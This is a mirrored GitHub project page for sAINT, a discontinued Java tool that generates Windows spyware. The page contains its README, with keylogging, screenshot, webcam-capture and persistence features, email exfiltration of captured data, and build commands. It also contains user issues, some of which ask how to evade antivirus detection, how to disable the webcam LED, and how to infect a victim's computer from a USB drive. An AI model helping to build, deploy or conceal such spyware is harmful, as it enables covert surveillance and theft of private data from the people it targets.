GithubHelp home page GithubHelp logo

tiagorlampert / saint Goto Github PK

View Code? Open in Web Editor NEW
679.0 78.0 306.0 10.6 MB

:eye: (s)AINT is a Spyware Generator for Windows systems written in Java. [Discontinued]

License: BSD 3-Clause "New" or "Revised" License

Batchfile 0.50% Shell 3.43% Java 96.06%
spyware keylogger hacking-tool hacking java java-8 tool kali screenshot persistence

saint's Introduction


Discontinued

I decided to discontinue the development of this tool to concentrate my efforts on others one projects.

Please fell free to clone this repository and continue the development of this tool.


(s)AINT

(s)AINT is a Spyware Generator for Windows systems written in Java.

Disclaimer

💻 This project was created only for good purposes and personal use.

THIS SOFTWARE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. YOU MAY USE THIS SOFTWARE AT YOUR OWN RISK. THE USE IS COMPLETE RESPONSIBILITY OF THE END-USER. THE DEVELOPERS ASSUME NO LIABILITY AND ARE NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE CAUSED BY THIS PROGRAM.

Features

  • Keylogger
  • Take Screenshot
  • Webcam Capture
  • Persistence

Tested On

Kali) Kali Linux - ROLLING EDITION

How To Use

# Install dependencies (you need Maven and JDK 8 package installed)
$ apt install maven default-jdk default-jre openjdk-8-jdk openjdk-8-jre -y

# To generate a .EXE using launch4j are necessary the following packages
$ apt install zlib1g-dev libncurses5-dev lib32z1 lib32ncurses6 -y

# Clone this repository
$ git clone https://github.com/tiagorlampert/sAINT.git

# Go into the repository
$ cd sAINT

# Install and configure Maven libraries
$ chmod +x configure.sh
$ ./configure.sh

# Run
$ java -jar sAINT.jar

Note

  • On Windows, install the latest Java JRE 8 from Oracle.
  • E-mail will be sent when it reaches the specified number of characters.
  • Optionally you can enable Screenshot, Webcam Capture and Persistence.

FAQ

Why does the .EXE need java on target machine to run?

The JRE is required and the executable will not work without it. Because the Windows need JRE for translating the program from java byte code to machine language.

Screenshot

Maven dependencies

Generate spyware

Run

Install Java JRE 8

Run .EXE

or Run .JAR

Data

Local

E-mail

How to uninstall

To uninstall run UNINSTALL.bat with administrative permissions.

Contact

📧 [email protected]

License

The BSD 3-Clause License

Copyright (c) 2017, Tiago Rodrigo Lampert

All rights reserved.

Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:

  • Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.

  • Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.

  • Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.

THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

saint's People

Contributors

masterflomaster1 avatar tiagorlampert avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

saint's Issues

Doesn't work on the other machines?

I've tried this on my own computer and it does work fine, but I gave the file to 2 of my friends with their permissions of course, and neither both send anything to the email even they have typed the amount of how many characters I set.

Does it actually work on the outside? or only on my machine?

TurnOff THE CAM LED

Nice work. But what do you think while taking the screen from webCam, turn off the led?

unable to locate

hi there ,
during the install, i was unable to locate the libs: lib32z1 and lib32ncurses5. the command the was used is : apt install zlib1g-dev libncurses5-dev lib32z1 lib32ncurses5 -y
what am i doing wrong here?

thanks

Antivirus

This program is already in antivirus databases, it’s detects by 24 of 64 antivirus programs. Could you advise how to rewrite it?

Saint does not work if launched from USB

I noticed an unpleasant feature. If I run the file from the desktop - all works fine. But, if I put this file on flash usb, run it, disconnect - then no emails are no longer coming. Is it possible to fix this?

It turns out, you need to move the file to the "victim's" computer, which is not very convenient. The ability to insert a flash drive and pull, thereby infecting the computer without manipulation (like badUSB) disappears.

Exception in thread "main"

[*] The information above is correct? (y/n): y
Exception in thread "main" java.lang.IllegalArgumentException: Illegal group reference: group index is missing
at java.util.regex.Matcher.appendReplacement(Matcher.java:819)
at java.util.regex.Matcher.replaceAll(Matcher.java:955)
at java.lang.String.replaceAll(String.java:2223)
at saint.ui.sAINT.replaceWord(sAINT.java:98)
at saint.ui.sAINT.showGenerator(sAINT.java:365)
at saint.ui.sAINT.showMenu(sAINT.java:221)
at saint.ui.sAINT.main(sAINT.java:71)

ArchLinux (Monjaro)

Hi, how to install on ArchLinux?
I install only "maven".
These packages are not in the repository: default-jdk default-jre openjdk-8-jdk openjdk-8-jre zlib1g-dev libncurses5-dev lib32z1 lib32ncurses6

sAINT start up but there are mistakes

          +---------------------------------------------------+
    (__)  | WARNING: Use Gmail account only!                  |
 (|)(00)  | E-mail will be sent when it reaches the specified |
  |/(__)\ | number of characters. Optionally you can enable   |
  |_/ _|  | Screenshot, Webcam Capture and Persistence.       |
          +---------------------------------------------------+

 GENERATE SPYWARE
 --------------------------------------------

 [*] Enter your E-mail: ***@gmail.com    
 [*] Enter your Password: ***
 [*] Enable Screenshot (Y/n): y
 [*] Enable WebCam (Y/n): y
 [*] Enable Persistence (Y/n): y
 [*] Keep data on the computer? (Y/n): y
 [*] Enter the number of characters to send E-mail: 500

 +------------------------------------------+
   Email: ***@gmail.com
   Password: ***
   Screenshot: true
   Webcam: true
   Persistence: true
   Keep Data: true
   Number of characters: 500
 +------------------------------------------+

 [*] The information above is correct? (y/n): y

 [*] Compiling...
 [*] Successfully compiled in target/ folder. 

 [*] You would like to generate .EXE using lauch4j? (y/n): y

 [*] Generating...
java.io.FileNotFoundException: launch4j/saint-1.0-jar-with-dependencies.exe (Нет такого файла или каталога)
        at java.base/java.io.FileInputStream.open0(Native Method)
        at java.base/java.io.FileInputStream.open(FileInputStream.java:213)
        at java.base/java.io.FileInputStream.<init>(FileInputStream.java:155)
        at saint.ui.sAINT.copyFile(sAINT.java:168)
        at saint.ui.sAINT.showGenerator(sAINT.java:399)
        at saint.ui.sAINT.showMenu(sAINT.java:221)
        at saint.ui.sAINT.main(sAINT.java:71)
 [*] Failed to generate file! 

 NOTE: Allow access to less secure apps on your gmail account. 
 -> https://www.google.com/settings/security/lesssecureapps 

I don't get email alerts

everything works fine, saint folder in AppData, with screenshots and key-logs stored locally but i get don't get them in my mail?

[!] OS is not supported!

[!] OS is not supported!
I am getting the above error after a successful build
Someone please help...
Screenshot (10)

Discontinued Project


Discontinued

I decided to discontinue the development of this tool to concentrate my efforts on others one projects.

Please fell free to clone this repository and continue the development of this tool.


Unable to download

hello sir, i would like to ask about the sAINT tool.
i tried to run it with ./configure.sh but it was successful because i need a java library called maven.
so do you have any idea how can i fix it or where can i download the needed things please ?
Than You so much.
The issue

Error sending email

Hello, here is a mistake in the terminal, when sAINT tries to send data to the email

2

why the protocolConnetct returning false? When installing saint on terminal I checked mail password and login. Its right.

bug : hey guyes this project throw a error when I execute the command : ./configure.sh

[BUILD FAILURE ERROR] Could not find goal 'single' in plugin org.apache.maven.plugins:maven-assembly-plugin:2.2-beta-5 among available goals directory, assembly, directory-single, attached, single, help, unpack, directory-inline -> [Help 1]

hey guyes this project throw a error as above when I execute the command : ./configure.sh and my os informations as follows :

#mvn -version
Apache Maven 3.6.3
Maven home: /usr/share/maven
Java version: 11.0.7-ea, vendor: Debian, runtime: /usr/lib/jvm/java-11-openjdk-amd64
Default locale: en_US, platform encoding: UTF-8
OS name: "linux", version: "5.2.0-kali2-amd64", arch: "amd64", family: "unix"

Hint : mvn archetype:create is deprecated in Maven 3.0.5 and beyond, as mentioned in the documentation Use mvn archetype:generate instead, but I don't know how to fix it bro

Email not recieve

Hi,
I made the installation on Kali Linux and I generated the jar file but when I tested on the Windows machine I note that the sAINT folder was created but I do not receive the Email despite that I used a gmail email address with the correct password

Not working after reboot

After restarting the computer sAint does not work. He's not involved in the trials. The letter never came. Everything works fine until reboot.There are only three folders in the AINT folder in my folder: Cam, logs, screenshot.
screenshot_1

Error ./configure.sh

apt install maven default-jdk default-jre openjdk-8-jdk openjdk-8-jre -y
apt install zlib1g-dev libncurses5-dev lib32z1 lib32ncurses6 -y
chmod +x configure.sh
./configure.sh
....
default

Why does it print "Successfully compiled", although actually error?


 [*] Compiling...
 [*] Successfully compiled in target/ folder. 

 [*] You would like to generate .EXE using lauch4j? (y/n): y
java.io.FileNotFoundException: target/saint-1.0-jar-with-dependencies.jar (Нет такого файла или каталога)

Also there is nothing in the target folder.
System is Arch Linux. I have installed maven and it dependency(openjdk), and launch4j. What I should install yet?

error ./configure.sh

When i do ./configure.sh at the final it says :
./configure.sh: line 2: mvn: command not found
./configure.sh: line 3: mvn: command not found
./configure.sh: line 4: mvn: command not found
./configure.sh: line 5: mvn: command not found
./configure.sh: line 6: mvn: command not found
./configure.sh: line 7: mvn: command not found
./configure.sh: line 8: mvn: command not found
./configure.sh: line 9: mvn: command not found
./configure.sh: line 10: mvn: command not found
./configure.sh: line 11: mvn: command not found
./configure.sh: line 12: mvn: command not found
./configure.sh: line 13: mvn: command not found
./configure.sh: line 14: mvn: command not found

What can i do?

Failed to generate file

[*] Generating... java.io.FileNotFoundException: launch4j/saint-1.0-jar-with-dependencies.exe (No such file or directory) at java.base/java.io.FileInputStream.open0(Native Method) at java.base/java.io.FileInputStream.open(FileInputStream.java:219) at java.base/java.io.FileInputStream.<init>(FileInputStream.java:157) at saint.ui.sAINT.copyFile(sAINT.java:168) at saint.ui.sAINT.showGenerator(sAINT.java:399) at saint.ui.sAINT.showMenu(sAINT.java:221) at saint.ui.sAINT.main(sAINT.java:71) [*] Failed to generate file!

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.